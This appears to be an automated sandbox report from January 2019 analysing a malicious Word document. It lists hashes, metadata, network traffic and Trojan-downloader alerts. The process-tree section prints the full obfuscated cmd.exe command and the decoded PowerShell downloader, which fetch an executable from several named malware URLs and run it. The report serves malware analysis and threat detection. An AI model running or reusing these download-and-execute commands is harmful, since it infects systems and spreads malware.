File name: | Malware_MSOLE2_08a8469304bdab9e7d748e4a2e748d6f047c2bca26bd0d7d56f3e5d051313f58 |
Full analysis: | https://app.any.run/tasks/94aa603f-f668-44c2-b981-16e4f14e0d0e |
Verdict: | Malicious activity |
Analysis date: | January 18, 2019, 08:55:06 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Jan 16 06:12:00 2019, Last Saved Time/Date: Wed Jan 16 06:12:00 2019, Number of Pages: 1, Number of Words: 2, Number of Characters: 14, Security: 0 |
MD5: | C9AC3811CEE43CC6ED16AB0F250AA7FC |
SHA1: | 9E9B71774C22453541FDE9F51D92EFB9F299CA9C |
SHA256: | 08A8469304BDAB9E7D748E4A2E748D6F047C2BCA26BD0D7D56F3E5D051313F58 |
SSDEEP: | 1536:Zocn1kp59gxBK85fBx6GmB0xgc2tJ+a9:u41k/W48/tS0x |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:01:16 06:12:00 |
ModifyDate: | 2019:01:16 06:12:00 |
Pages: | 1 |
Words: | 2 |
Characters: | 14 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 15 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2956 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Malware_MSOLE2_08a8469304bdab9e7d748e4a2e748d6f047c2bca26bd0d7d56f3e5d051313f58.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3964 | "C:\Windows\system32\cmd.exe" /c %PRoGRamDATa:~0,1%%pRogRAMdATA:~9,2% /V /r " sEt hfz=pow^%PU[2)C:~5,6^%ul^%SESS)ONN?ME:~`4,6^%h^%$EMP:~`3,6^%]] -S?SulgJu2'RegJnionii';-digita]diu2new`object Net.WebC]ient;-[ulandidu2'http://www.agJtomatizatgJpyme.com/De]4?8f@http://pos.ulgJmen8.com/wp`content/cache/GVV9yia7@http://tuliet]ongtangoc.info/m6[RgJY5QJj@http://theulyangulogJp.so]gJtions/6U5ulfD7X@http://ongeLeeulgulatis.n]/9LjJU[V'.Sp]it('@'_;-oulangepmu2'KidsJewe]eulyzul';-guleenda u2 '908';-#oulizonta]hulu2'1ulozenkt';-?)]wu2-enL:pgJb]ic+'\'+-guleenda+'.exe';fouleach(-De]awauleip in -[ulandid_{tuly{-digita]di.Down]oad1i]e(-De]awauleip, -?)]w_;-wiule]esshnu2'fgJnctiona]itiessgJ';)f ((Get`)tem -?)]w_.]ength `ge 80000_ {)nLoke`)tem -?)]w;-ShoesJewe]eulydzu2'Shoesab';buleak;}}catch{}}-?GPwmu2'bandwidthLa';& SeT 3jZA=!hfz:u2==!& seT Y7b=!3jZA:ul=r!& set Bm2=!Y7b:gJ=u!&& SET XNQI=!Bm2:[=B!&& set R1=!XNQI:L=v!& set USf=!R1:$=T!& SET mD=!USf:1=F!&sET 9Zc=!mD:?=A!&& seT Vm=!9Zc:2=L!&& SET HwL=!Vm:)=I!&& sEt hY=!HwL:]=l!& Set Dv=!hY:_=)!& SET UJC=!Dv:6=1!& SET BXk=!UJC:#=H!& SEt Wyzv=!BXk:-=$!&& sEt 2H=!Wyzv:`=-!&&ecHO %2H% |cMD.EXE" | C:\Windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2504 | CmD /V /r " sEt hfz=pow^%PU[2)C:~5,6^%ul^%SESS)ONN?ME:~`4,6^%h^%$EMP:~`3,6^%]] -S?SulgJu2'RegJnionii';-digita]diu2new`object Net.WebC]ient;-[ulandidu2'http://www.agJtomatizatgJpyme.com/De]4?8f@http://pos.ulgJmen8.com/wp`content/cache/GVV9yia7@http://tuliet]ongtangoc.info/m6[RgJY5QJj@http://theulyangulogJp.so]gJtions/6U5ulfD7X@http://ongeLeeulgulatis.n]/9LjJU[V'.Sp]it('@'_;-oulangepmu2'KidsJewe]eulyzul';-guleenda u2 '908';-#oulizonta]hulu2'1ulozenkt';-?)]wu2-enL:pgJb]ic+'\'+-guleenda+'.exe';fouleach(-De]awauleip in -[ulandid_{tuly{-digita]di.Down]oad1i]e(-De]awauleip, -?)]w_;-wiule]esshnu2'fgJnctiona]itiessgJ';)f ((Get`)tem -?)]w_.]ength `ge 80000_ {)nLoke`)tem -?)]w;-ShoesJewe]eulydzu2'Shoesab';buleak;}}catch{}}-?GPwmu2'bandwidthLa';& SeT 3jZA=!hfz:u2==!& seT Y7b=!3jZA:ul=r!& set Bm2=!Y7b:gJ=u!&& SET XNQI=!Bm2:[=B!&& set R1=!XNQI:L=v!& set USf=!R1:$=T!& SET mD=!USf:1=F!&sET 9Zc=!mD:?=A!&& seT Vm=!9Zc:2=L!&& SET HwL=!Vm:)=I!&& sEt hY=!HwL:]=l!& Set Dv=!hY:_=)!& SET UJC=!Dv:6=1!& SET BXk=!UJC:#=H!& SEt Wyzv=!BXk:-=$!&& sEt 2H=!Wyzv:`=-!&&ecHO %2H% |cMD.EXE" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2756 | C:\Windows\system32\cmd.exe /S /D /c" ecHO %2H% " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2876 | cMD.EXE | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3364 | powershell $SASru='Reunionii';$digitaldi=new-object Net.WebClient;$Brandid='http://www.automatizatupyme.com/Del4A8f@http://pos.rumen8.com/wp-content/cache/GVV9yia7@http://trietlongtangoc.info/m1BRuY5QJj@http://theryangroup.solutions/1U5rfD7X@http://ongeveergratis.nl/9vjJUBV'.Split('@');$orangepm='KidsJeweleryzr';$greenda = '908';$Horizontalhr='Frozenkt';$AIlw=$env:public+'\'+$greenda+'.exe';foreach($Delawareip in $Brandid){try{$digitaldi.DownloadFile($Delawareip, $AIlw);$wirelesshn='functionalitiessu';If ((Get-Item $AIlw).length -ge 80000) {Invoke-Item $AIlw;$ShoesJewelerydz='Shoesab';break;}}catch{}}$AGPwm='bandwidthva'; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2956 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR893B.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2956 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\34BA0790.wmf | — | |
MD5:— | SHA256:— | |||
2956 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4120241E.wmf | — | |
MD5:— | SHA256:— | |||
3364 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2CT5QN6GS88RJ007UNWD.temp | — | |
MD5:— | SHA256:— | |||
3364 | powershell.exe | C:\Users\Public\908.exe | — | |
MD5:— | SHA256:— | |||
2956 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:64C61735DBC64018968099CFAD655851 | SHA256:B122C1B8060B8C869A016EE692F1F3D6A5A468CC6D8D6B8507FDC6BFB8DAAE75 | |||
2956 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8985C251.wmf | wmf | |
MD5:B0C3799CAD076A1E8AF9C0A6A76046B8 | SHA256:93D5346C76BC24E74810492A95DA38929FEAC4DF25A5CD2D9C03D62AB5EFA123 | |||
3364 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF199e98.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
3364 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2956 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:9E45D8F2E35DE364503F53066FEBD232 | SHA256:CEF5E6B27CC27FACF73BE04D8E25ED6B68DF30EE3F659B7EEC22B879A1A8F1E1 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3364 | powershell.exe | GET | 301 | 45.124.86.88:80 | http://trietlongtangoc.info/m1BRuY5QJj | VN | html | 247 b | malicious |
3364 | powershell.exe | GET | 403 | 45.124.86.88:80 | http://trietlongtangoc.info/m1BRuY5QJj/ | VN | html | 487 b | malicious |
3364 | powershell.exe | GET | 200 | 97.79.236.65:80 | http://www.automatizatupyme.com/cgi-sys/suspendedpage.cgi | US | html | 7.42 Kb | malicious |
3364 | powershell.exe | GET | 302 | 97.79.236.65:80 | http://www.automatizatupyme.com/Del4A8f | US | html | 241 b | malicious |
3364 | powershell.exe | GET | 404 | 91.134.143.44:80 | http://theryangroup.solutions/1U5rfD7X | FR | html | 294 b | malicious |
3364 | powershell.exe | GET | 404 | 185.104.29.44:80 | http://ongeveergratis.nl/9vjJUBV | NL | html | 324 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3364 | powershell.exe | 45.124.86.88:80 | trietlongtangoc.info | VNPT Corp | VN | malicious |
3364 | powershell.exe | 185.104.29.44:80 | ongeveergratis.nl | Stichting DIGI NL | NL | malicious |
3364 | powershell.exe | 97.79.236.65:80 | www.automatizatupyme.com | Global Virtual Opportunities | US | malicious |
3364 | powershell.exe | 91.134.143.44:80 | theryangroup.solutions | OVH SAS | FR | malicious |
Domain | IP | Reputation |
---|---|---|
www.automatizatupyme.com |
| malicious |
pos.rumen8.com |
| suspicious |
trietlongtangoc.info |
| malicious |
theryangroup.solutions |
| malicious |
ongeveergratis.nl |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
3364 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3364 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
3364 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious redirect to 'suspendedpage.cgi' |
3364 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3364 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
3364 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3364 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
3364 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3364 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |